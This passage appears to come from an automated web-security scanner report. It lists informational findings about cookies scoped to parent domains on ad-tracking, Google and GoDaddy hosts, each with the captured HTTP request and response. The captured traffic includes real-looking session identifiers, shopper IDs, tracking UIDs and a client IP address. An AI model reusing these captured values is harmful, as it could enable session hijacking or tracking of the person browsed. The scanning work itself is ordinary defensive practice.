The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/vasco.com/p.json?callback=_ate.ad.hpr&uid=4e5e3f1ae3fd7427&url=http%3A%2F%2Fvasco.com%2Fcompany%2Fpress_room%2Fnews_archive%2F2011%2Fnews_diginotar_reports_security_incident.aspx&ref=http%3A%2F%2Fvasco.com%2F&1wh4476 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; di=%7B%7D..1314983342.10R|1314983342.1FE|1314983342.1OD|1314983342.60|1314983342.1EY; psc=4; uid=4e5e3f1ae3fd7427; uvc=17|35; uit=1

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 03 Sep 2011 17:32:22 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 03 Oct 2011 17:32:22 GMT; Path=/
Set-Cookie: di=%7B%7D..1315071141.10R|1315071142.1WV|1315071141.1FE|1314983342.1OD|1315071141.60|1315071141.1EY; Domain=.addthis.com; Expires=Mon, 02-Sep-2013 17:32:21 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 03 Sep 2011 17:32:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 03 Sep 2011 17:32:22 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

10.30. http://ib.adnxs.com/getuid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid?http%3A%2F%2Fcf.addthis.com%2Fred%2Fusync%3Fpid%3D6%26puid%3D%24UID HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid2=6422714091563403120; icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmEi'/29uJ21AU+]TP1m(hR)h523xzi'/4ZgI!6aZWx4#ZcNMkm2UReP=`CLdA!r):#o^)TD!vV^w#5O?0/><0pV3eGELw=b5$yyfs8q9<J.UiYhE029Q'Zi)hc5#t:

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 04-Sep-2011 17:34:45 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 17:34:45 GMT; domain=.adnxs.com; HttpOnly
Location: http://cf.addthis.com/red/usync?pid=6&puid=6422714091563403120
Date: Sat, 03 Sep 2011 17:34:45 GMT
Content-Length: 0


10.31. http://ib.adnxs.com/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=165828&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/?subcats=Y&status=A&pshort=Y&pfull=Y&pname=Y&pkeywords=Y&search_performed=Y&cid=0&q=xss&x=0&y=0&dispatch=products.search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmEi'/29uJ21V.fsQSr=z6NGgptu>0_YXw_T%?9*a5p4!1-waB6<#uuy!Q#lx*XEB@`D:dkd7>T]xMWu7a9T1Y1.^NXLlK839uon7j94%gch60)-@(Z_[!1jn1vzCbx; sess=1; uuid2=6422714091563403120

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 04-Sep-2011 21:31:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 21:31:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG5`$cvjr/?0P(*AuB-u**g1:XIF)WEi'/29uJ21V)`B-9`/7Ko9MUt3xzi'/4ZgI!6aZWx4#ZcXfR=T@A^0Y`4jmC=WN@m!nW>/7tnkB5j%8zT+4q#daaX4Tjg6O#PQRq%^).H=M=x0Xe3#2vn<%BNdgF1+j)nl2fp%0; path=/; expires=Fri, 02-Dec-2011 21:31:05 GMT; domain=.adnxs.com; HttpOnly
Location: http://cm.g.doubleclick.net/pixel?nid=appnexus1
Date: Sat, 03 Sep 2011 21:31:05 GMT
Content-Length: 0


10.32. http://ib.adnxs.com/setuid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /setuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /setuid?entity=34&code=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=WWW000000000W&dtmc_ref=&dtmc_loc=http%3A//www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmEi'/29uJ21AU+]TP1m(hR)h523xzi'/4ZgI!6aZWx4#ZcNMkm2UReP=`CLdA!r):#o^)TD!vV^w#5O?0/><0pV3eGELw=b5$yyfs8q9<J.UiYhE029Q'Zi)hc5#t:; sess=1; uuid2=6422714091563403120

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 04-Sep-2011 21:33:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 21:33:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SoJ1?kmIqrI`B1!pj[=8$^@U1YIFBG7*NsKA-5?XJ>2v6N)if.pXdfOB!(4(%Pq$T60KmpWC[?NT!^`u7i*QgR(K-EF4/<<!tv0qoKKPh=r*T>2(K$r!f#D(i; path=/; expires=Fri, 02-Dec-2011 21:33:40 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Sat, 03 Sep 2011 21:33:40 GMT

GIF89a.............!.......,........@..L..;

10.33. http://id.google.com/verify/EAAAAB18MDCNmAWnZ6ZMKxFbyXM.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAB18MDCNmAWnZ6ZMKxFbyXM.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAB18MDCNmAWnZ6ZMKxFbyXM.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/blank.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=50=u5vZn_NDJXw_46xb3szsC8KHo7mSQ9vRO8iZmFjxYw=YsUbv9G_3-MoPapq; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=dYdXb1ScZWRJMvBrNEHDfLjfOocGh7bNH6BGA3vRVqKYi3SPaS4s8VflEEZyzxRJp0RFQHbwIFv7qAsJNvrMyJFPuL9b0_3fjdGh0Mx_82XLAISmwar_I3OOxUz-5M-7

Response

HTTP/1.1 200 OK
Set-Cookie: NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS; expires=Sun, 04-Mar-2012 21:29:07 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sat, 03 Sep 2011 21:29:07 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.34. http://id.google.com/verify/EAAAADMsrH8QTeh7gqteYecpwnc.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAADMsrH8QTeh7gqteYecpwnc.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAADMsrH8QTeh7gqteYecpwnc.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=compression+dotnetnuke
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=50=gYkfLrkEFRObhJ_AMsvalPNTB0r00AJPRsl-2PCVwA=MlhIz5-TO3pmQU2Z; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=aYJjaoJUNshldk3FUs-vgsnQPJuDrjBt3LzHNFQ3N3bLmMufnkOZ7iX2MROGgKXHYJfo8-7QDL4Tqk2kAaYx2lrsnOlscEXcdgi_FMD_BsfBB0Tnyn77h3FbX1c9opy9

Response

HTTP/1.1 200 OK
Set-Cookie: NID=50=dYdXb1ScZWRJMvBrNEHDfLjfOocGh7bNH6BGA3vRVqKYi3SPaS4s8VflEEZyzxRJp0RFQHbwIFv7qAsJNvrMyJFPuL9b0_3fjdGh0Mx_82XLAISmwar_I3OOxUz-5M-7; expires=Sun, 04-Mar-2012 15:05:05 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sat, 03 Sep 2011 15:05:05 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.35. http://id.google.com/verify/EAAAALzxzy-p1oHxNaVBpSOT2kM.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAALzxzy-p1oHxNaVBpSOT2kM.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAALzxzy-p1oHxNaVBpSOT2kM.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ssl+certificates
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=50=gYkfLrkEFRObhJ_AMsvalPNTB0r00AJPRsl-2PCVwA=MlhIz5-TO3pmQU2Z; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=dYdXb1ScZWRJMvBrNEHDfLjfOocGh7bNH6BGA3vRVqKYi3SPaS4s8VflEEZyzxRJp0RFQHbwIFv7qAsJNvrMyJFPuL9b0_3fjdGh0Mx_82XLAISmwar_I3OOxUz-5M-7

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=50=u5vZn_NDJXw_46xb3szsC8KHo7mSQ9vRO8iZmFjxYw=YsUbv9G_3-MoPapq; expires=Sun, 04-Mar-2012 21:28:32 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sat, 03 Sep 2011 21:28:32 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.36. http://idcs.interclick.com/Segment.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=46b8b784-19e0-4400-8cdb-f6284ddc3d9a HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=WWW000000000W&dtmc_ref=&dtmc_loc=http%3A//www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=ef156cf5-d9a2-4704-9dc3-362f08c1bcb4; sgm=12290=734380

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=12290=734380&7435=734382; domain=.interclick.com; expires=Fri, 03-Sep-2021 21:34:02 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 03 Sep 2011 21:34:02 GMT

GIF89a.............!.......,...........D..;

10.37. https://idp.godaddy.com/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://idp.godaddy.com
Path:   /login.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.aspx?SPKey=GDMYA-M1PWMYAWEB006&redirect=true&myaurl=%2fdefault.aspx HTTP/1.1
Host: idp.godaddy.com
Connection: keep-alive
Referer: https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB109&target=http%3A%2F%2Fwww.godaddy.com%2Fssl%2Fssl-certificates.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; ASP.NET_SessionId=pwylm3umzkrcsc3bnf5ymbnz; pathway=4f057259-4645-4223-96aa-98d6262a1c68; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=3; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; traffic=; ShopperId1=miaasiuadhnegiagkeyasfgdujffpbkb

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 00:30:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://mya.godaddy.com/login_redirect.aspx?idpinfo=none&SPKey=GDMYA-M1PWMYAWEB006&myaurl=%2fdefault.aspx
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:30:45 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:30:45 GMT; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=ca8f10ab-5a85-4bac-9b43-0ef09fae1617&referringdomain=&split=13; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=ca8f10ab-5a85-4bac-9b43-0ef09fae1617&referringdomain=&split=13; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 230

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://mya.godaddy.com/login_redirect.aspx?idpinfo=none&amp;SPKey=GDMYA-M1PWMYAWEB006&amp;myaurl=%2fdefault.aspx">he
...[SNIP]...

10.38. https://idp.godaddy.com/retrieveaccount.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://idp.godaddy.com
Path:   /retrieveaccount.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /retrieveaccount.aspx?ci=9107&spkey=GDSWNET-M1PWCORPWEB101 HTTP/1.1
Host: idp.godaddy.com
Connection: keep-alive
Referer: https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB101&target=http%3A%2F%2Fwww.godaddy.com%2Faffiliates%2Faffiliate-program.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; ASP.NET_SessionId=pwylm3umzkrcsc3bnf5ymbnz; pathway=4f057259-4645-4223-96aa-98d6262a1c68; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; ShopperId1=oemhlbvbcgufsjahmchddfndphwizcii; pagecount=3; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; traffic=

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:27:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:27:41 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:27:41 GMT; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=a1743495-9530-4d25-a9ca-bb977519280d&referringdomain=&split=13; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=a1743495-9530-4d25-a9ca-bb977519280d&referringdomain=&split=13; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 97068


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="https:/
...[SNIP]...

10.39. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTc4JnRsPTE1NzY4MDA=&piggybackCookie=uid:6422714091563403120 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/index.php?status=A&pshort=Y&pfull=Y&pname=Y&pkeywords=Y&search_performed=Y&cid=0&q=xss&x=0&y=0&dispatch=products.search&features_hash=P14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:23:54 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1409703834; domain=pubmatic.com; expires=Wed, 03-Sep-2014 00:23:54 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

10.40. http://img.godaddy.com/image.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.godaddy.com
Path:   /image.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /image.aspx?sitename=www.godaddy.com&server=M1PWCORPWEB109&shopper=46215684&privatelabelid=1&status=200&rand=0.781776874690213&page=%2fssl%2fssl-certificates.aspx&split=24 HTTP/1.1
Host: img.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=3&fMajorVer=10&slMajorVer=-1&slMinorVer=-1; pagecount=2; fb_pagecount=2; actioncount=; fb_actioncount=; app_pathway=; fb_session=S_TOUCH=09/03/2011 21:32:13&pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40&V_DATE=09/03/2011 14:28:59; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB109&status=200 